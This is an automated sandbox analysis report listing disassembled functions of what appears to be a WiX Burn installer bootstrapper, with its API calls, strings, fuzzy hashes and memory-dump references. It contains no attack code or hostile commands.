API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: 603266866a5a73ac4bd271cc00aaf0b2d3290fd98f79cdb7b64c143622f3b812
Instruction ID: 0878c0a9286b000576d91a8db4059b62c457d15ea3b795f248690ffc51d02605
Opcode Fuzzy Hash: 603266866a5a73ac4bd271cc00aaf0b2d3290fd98f79cdb7b64c143622f3b812
Instruction Fuzzy Hash: BB218C32100208BFDB566F68DC4CE7B3FB9FF49721B164619FA169B2A0D73588109B61

Function 007D9F36 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 220COMMON

Download Yara Rule

Strings

Failed to combine layout source with source., xrefs: 007DA0A0
Failed to get bundle layout directory property., xrefs: 007DA083
Failed to combine last source with source., xrefs: 007DA00C
Failed to get current process directory., xrefs: 007D9FEF
Failed to copy source path., xrefs: 007DA113
WixBundleOriginalSource, xrefs: 007D9FB3
WixBundleLayoutDirectory, xrefs: 007DA068
WixBundleLastUsedSource, xrefs: 007D9F9D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: c30bc7618da066538d51048ff59fddbc3ade56f08d37385fe4a854d3d9fe8b20
Instruction ID: dc548d366db522a9528e37e350a69003ab3b82b52fb79cac857a17d3f8e9cfd1
Opcode Fuzzy Hash: c30bc7618da066538d51048ff59fddbc3ade56f08d37385fe4a854d3d9fe8b20
Instruction Fuzzy Hash: C3714C71D00219EBDF159FA8DC45AEEBBB9FF08310F14012AE911F6390E7799D809B66

Function 007C3083 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000040,00000000,00000000), ref: 007C30C7
GetLastError.KERNEL32 ref: 007C30D1
ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C3129
GetLastError.KERNEL32 ref: 007C3133
GetFullPathNameW.KERNEL32(00000000,00000040,00000000,00000000,00000000,00000040,00000000,00000000), ref: 007C31EC
GetLastError.KERNEL32 ref: 007C31F6
GetFullPathNameW.KERNEL32(00000000,00000007,00000000,00000000,00000000,00000007), ref: 007C324D
GetLastError.KERNEL32 ref: 007C3257

Strings

pathutil.cpp, xrefs: 007C30F5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: 22ee7e533fe67aae36a94f00f954a24597d5b38ba3fb90b34a59ac50059670bd
Instruction ID: 70a0f37b0f180c88a87ca3ba284dca3cabab20f29ae855acf7e3fd4dce204bea
Opcode Fuzzy Hash: 22ee7e533fe67aae36a94f00f954a24597d5b38ba3fb90b34a59ac50059670bd
Instruction Fuzzy Hash: 6861A432E00629EBEF219AA58C48FAE77E8EF04751F01816DED15E7150E738CF409B90

Function 00806BF6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,7622DFD0,?,00807172,?,?), ref: 00806C4C
SysFreeString.OLEAUT32(00000000), ref: 00806CB7
SysFreeString.OLEAUT32(00000000), ref: 00806D2F
SysFreeString.OLEAUT32(00000000), ref: 00806D71

Strings

scheme, xrefs: 00806C5F
term, xrefs: 00806C7F
label, xrefs: 00806C3E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$Free$Compare
String ID: label$scheme$term
API String ID: 1324494773-4117840027
Opcode ID: 177bdd6e93f517bd0858c5a3a48419ab15a21b74a697072f75953dfb3c4e5231
Instruction ID: 9e224eb6d99199a54fbf2d93e60aa7829f81584e0c9e3f44311b76c2a528f7c3
Opcode Fuzzy Hash: 177bdd6e93f517bd0858c5a3a48419ab15a21b74a697072f75953dfb3c4e5231
Instruction Fuzzy Hash: F3513A75A01219FBDB55CB94CC55EAEBBB8FF04724F200295F911EA2E0E7319E60DB50

Function 007C4690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 007C46B5
GetCurrentThreadId.KERNEL32 ref: 007C46BB

Part of subcall function 007DFC51: new.LIBCMT ref: 007DFC58

GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C4749

Strings

user.cpp, xrefs: 007C4795
Failed to load UX., xrefs: 007C46FE
Failed to create user for UX., xrefs: 007C46D5
Failed to start bootstrapper application., xrefs: 007C4717
Unexpected return value from message pump., xrefs: 007C479F
wininet.dll, xrefs: 007C46E8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: a748d5af5827a8b5624034358f2c294a1f1854911c18ed92fa89f168b7466007
Instruction ID: aceec5d641ef9a1c3d086daf45e0144c11dcf3bf48d273793f2cf15940d3e15b
Opcode Fuzzy Hash: a748d5af5827a8b5624034358f2c294a1f1854911c18ed92fa89f168b7466007
Instruction Fuzzy Hash: 89419172600615BFEB149BA4CC99FBAB7ACFF05324F10012DF915E7280EB29AD5587A1

Function 007D8CB5 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 007D8E01

Strings

Failed to allocate access for Administrators group to path: %ls, xrefs: 007D8D08
Failed to allocate access for Everyone group to path: %ls, xrefs: 007D8D4A
Failed to create ACL to secure cache path: %ls, xrefs: 007D8DB7
Failed to allocate access for Users group to path: %ls, xrefs: 007D8D6B
cache.cpp, xrefs: 007D8DAC
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 007D8D29
Failed to secure cache path: %ls, xrefs: 007D8DE4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: 28750ceae1f86f3859038041ba8b0efbb419ec870fde0b50cdb529e88c5e6879
Instruction ID: cded705ef76fe83cd430d061364d7626a1f3473ddf7448fa611a083cb8fd572d
Opcode Fuzzy Hash: 28750ceae1f86f3859038041ba8b0efbb419ec870fde0b50cdb529e88c5e6879
Instruction Fuzzy Hash: 01412671B41229B6EB719A648C45FEB3A7CEF54B10F00406AF908FA3C0DE689D44C7A2

Function 007E9A57 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 125COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,007EADE5,?,00000001,00000000), ref: 007E9AE1
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9AEB
CopyFileExW.KERNEL32(00000000,00000000,007E993C,00000000,00000020,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 007E9B39
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9B68

Strings

Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 007E9B9A
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 007E9B61
copy, xrefs: 007E9AAF
apply.cpp, xrefs: 007E9B0F, 007E9B53, 007E9B8C
Failed to clear readonly bit on payload destination path: %ls, xrefs: 007E9B1A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 25717622795331f9685350656cb7b5ed9d94a43d2d5fe1bdae6ea59552f99112
Instruction ID: 9f045054789ee5ed5cd29e534447b4a91ec6cca11cc63b97f7b3a42c2da840df
Opcode Fuzzy Hash: 25717622795331f9685350656cb7b5ed9d94a43d2d5fe1bdae6ea59552f99112
Instruction Fuzzy Hash: EE3139B2B41655BBE7109A66DC85FB7B3ADFF48740F108129BD15DB291E728CD00C6E1

Function 007DE05E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 007DE094
GetLastError.KERNEL32 ref: 007DE0A0
GetObjectW.GDI32(00000000,00000018,?), ref: 007DE0E7
GetCursorPos.USER32(?), ref: 007DE108
MonitorFromPoint.USER32(?,?,00000002), ref: 007DE11A
GetMonitorInfoW.USER32(00000000,?), ref: 007DE130

Strings

(, xrefs: 007DE127
splashscreen.cpp, xrefs: 007DE0C4
Failed to load splash screen bitmap., xrefs: 007DE0CE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: b3450b4dbe9baee4888fcee00189307176cfb03be6cc29ecbafcb983885b4803
Instruction ID: 60bc51eb2269f9cdada01fe80219ff6fef67487ca3074d22c21f055392fab07a
Opcode Fuzzy Hash: b3450b4dbe9baee4888fcee00189307176cfb03be6cc29ecbafcb983885b4803
Instruction Fuzzy Hash: 40313E71A002199FDB50DFB8D989A9EBBF5FF08710F148129F904EB280EB74D901CBA0

Function 007CC7DF Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 97fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007CCC57: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,007CE336,000000FF,00000000,00000000,007CE336,?,?,007CDADD,?,?,?,?), ref: 007CCC82

CreateFileW.KERNEL32(E90080BA,80000000,00000005,00000000,00000003,08000000,00000000,007C52BD,0080B450,00000000,007C53B5,04680A79,?,007C52B5,00000000,007C5381), ref: 007CC84F
GetLastError.KERNEL32(?,?,?,007D75F7,007C5565,007C5371,007C5371,00000000,?,007C5381,FFF9E89D,007C5381,007C53B5,007C533D,?,007C533D), ref: 007CC894

Strings

catalog.cpp, xrefs: 007CC8B5
=S|, xrefs: 007CC7E5, 007CC872
Failed to find payload for catalog file., xrefs: 007CC8D9
Failed to verify catalog signature: %ls, xrefs: 007CC88D
Failed to get catalog local file path, xrefs: 007CC8D2
Failed to open catalog in working path: %ls, xrefs: 007CC8C2
=S|, xrefs: 007CC86F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: =S|$=S|$Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-1895143771
Opcode ID: d84d7778138c5c64eabc611802a9dc417274199f6d13c87c90e99e08ed3a71fe
Instruction ID: bb797ca6c1d0a4dbed4ac97c0872e2ebddec8956231fe77660d098b89f1ffe67
Opcode Fuzzy Hash: d84d7778138c5c64eabc611802a9dc417274199f6d13c87c90e99e08ed3a71fe
Instruction Fuzzy Hash: AF31C231A40615BFDB229B68CC45F5ABBE4FF04720F11822DF918EB691E778AD509BD0

Function 007C64B6 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 93COMMON

Download Yara Rule

APIs

GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 007C64F7
GetLastError.KERNEL32 ref: 007C6505
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C6546
GetLastError.KERNEL32 ref: 007C6550

Strings

Failed to get 32-bit system folder., xrefs: 007C653F
Failed to backslash terminate system folder., xrefs: 007C65A2
Failed to set system folder variant value., xrefs: 007C65BE
Failed to get 64-bit system folder., xrefs: 007C657E
variable.cpp, xrefs: 007C6535, 007C6574

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastSystem$Wow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 2634638900-1590374846
Opcode ID: eb9ee3af6b98165756abcd6b18fcd6076458e99e6fa4c08a4420fd2aa4c07098
Instruction ID: 9313ed619c5fed9afca60722450518eb6203c636c19ed655e1ed08ac053ec43e
Opcode Fuzzy Hash: eb9ee3af6b98165756abcd6b18fcd6076458e99e6fa4c08a4420fd2aa4c07098
Instruction Fuzzy Hash: 7E21E9B2A41334A7EB2057A5AC89F6A73D8EF04750F21416DFD18E72C0E66CCE0486E1

Function 007D4ED2 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,0080B4F0), ref: 007D4EDB
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 007D4F79
CloseHandle.KERNEL32(00000000), ref: 007D4F92

Strings

-q -%ls %ls %ls %u, xrefs: 007D4F00
Failed to allocate parameters for elevated process., xrefs: 007D4F14
runas, xrefs: 007D4F39
Failed to launch elevated child process: %ls, xrefs: 007D4F66
burn.elevated, xrefs: 007D4EFB
open, xrefs: 007D4F43, 007D4F51

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 4221c2a9a31a0b0e6532d1e6303ab4fbe529a21767306768da753fb600345734
Instruction ID: 9ea70e61260a1e0282d4a6005fe76a883e5a78876a9c06d06b78cbc452aa87ef
Opcode Fuzzy Hash: 4221c2a9a31a0b0e6532d1e6303ab4fbe529a21767306768da753fb600345734
Instruction Fuzzy Hash: 99212A75D00219BFCF019F98DC819AEBBB8FF04351B14816AF914E3351D7799E909B91

Function 007C671C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 007C6746
GetProcAddress.KERNEL32(00000000), ref: 007C674D
GetLastError.KERNEL32 ref: 007C6757

Strings

Failed to set variant value., xrefs: 007C67C3
DllGetVersion, xrefs: 007C6738
msi, xrefs: 007C673D
Failed to get msi.dll version info., xrefs: 007C679F
Failed to find DllGetVersion entry point in msi.dll., xrefs: 007C6785
variable.cpp, xrefs: 007C677B

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: 719486a217e586a19e7804e662e0b9d633d32bfe4d856d8577db64bac727e329
Instruction ID: baef5bfc5510705d2e5463cea79e90f664a6043b81b36cc9dc913ec87e824d35
Opcode Fuzzy Hash: 719486a217e586a19e7804e662e0b9d633d32bfe4d856d8577db64bac727e329
Instruction Fuzzy Hash: C9118471A40725AAE760ABB9DC85B7B77E8EB08B10F00451DFD15F7281DA689D0582E1

Function 007C1174 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1185
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1190
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119E
GetLastError.KERNEL32(?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11B9
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C1
GetLastError.KERNEL32(?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D6

Strings

SetDefaultDllDirectories, xrefs: 007C1198
kernel32, xrefs: 007C118B
SetDllDirectoryW, xrefs: 007C11BB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 94acca97c07a3b5bd21943bb7b0055dfbdac28b0abf13025764170d55bc3a83a
Instruction ID: 151c8a838873d242db67f909cb95559f74d7b7b673333498196229d9ebe0c216
Opcode Fuzzy Hash: 94acca97c07a3b5bd21943bb7b0055dfbdac28b0abf13025764170d55bc3a83a
Instruction Fuzzy Hash: EB01F771600619BBD7606BA69C09E6F7B6CFF42791B44802DFE25D2281DB7CDA01CBB0

Function 007DF3E6 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007DF3FB
LeaveCriticalSection.KERNEL32(?), ref: 007DF576

Strings

Failed to set download user., xrefs: 007DF4FE
UX did not provide container or payload id., xrefs: 007DF565
Failed to set download password., xrefs: 007DF524
user is active, cannot change user state., xrefs: 007DF415
Failed to set download URL., xrefs: 007DF4D5
UX requested unknown payload with id: %ls, xrefs: 007DF450
UX requested unknown container with id: %ls, xrefs: 007DF4A0
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 007DF466

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: e3a15f1dcbe806dbd6c878c6c06bdbe35359a64e444617864a67861837621ae6
Instruction ID: db48414784dee8e48ecfadbeb230fdddc654605e731c3721cc87d607442ea348
Opcode Fuzzy Hash: e3a15f1dcbe806dbd6c878c6c06bdbe35359a64e444617864a67861837621ae6
Instruction Fuzzy Hash: C841A371A00611EBDB259E24DC05E6A77B8FF04720F15813BE807EB341E76CDEA08BA1

Function 007DA998 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,000000FF,00AAC56B,?,007C52B5,00000000,=S|), ref: 007DAA90
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00AAC56B,?,007C52B5,00000000,=S|), ref: 007DAAD4

Strings

Failed to verify expected payload against actual certificate chain., xrefs: 007DAB1A
qS|qS|, xrefs: 007DA9B1
=S|, xrefs: 007DA9AB
=S|, xrefs: 007DA9A8
Failed to get signer chain from authenticode certificate., xrefs: 007DAB02
Failed authenticode verification of payload: %ls, xrefs: 007DAA71
Failed to get provider state from authenticode certificate., xrefs: 007DAABE
cache.cpp, xrefs: 007DAA66, 007DAAB4, 007DAAF8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast
String ID: =S|$=S|$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$qS|qS|
API String ID: 1452528299-78508317
Opcode ID: d9ac24f37efeccd43aa543315018dbeadc64308b93d13c35747bc82bf4b6a0b3
Instruction ID: 43b478421605c089139ba869a17d8907e7d5e11f1e9e961cf342b5458d1d0d25
Opcode Fuzzy Hash: d9ac24f37efeccd43aa543315018dbeadc64308b93d13c35747bc82bf4b6a0b3
Instruction Fuzzy Hash: 164198B1E00659ABEB10DBA9CD45BEF7BF8FF08310F00012AF915F7280E778594586A5

Function 00805916 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000000,000000FF,?,00000000,00000000), ref: 00805955
GetLastError.KERNEL32 ref: 00805963
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008059A4
GetLastError.KERNEL32 ref: 008059B1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00805B26
CloseHandle.KERNEL32(?), ref: 00805B35

Strings

dlutil.cpp, xrefs: 00805987
GET, xrefs: 00805A58

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

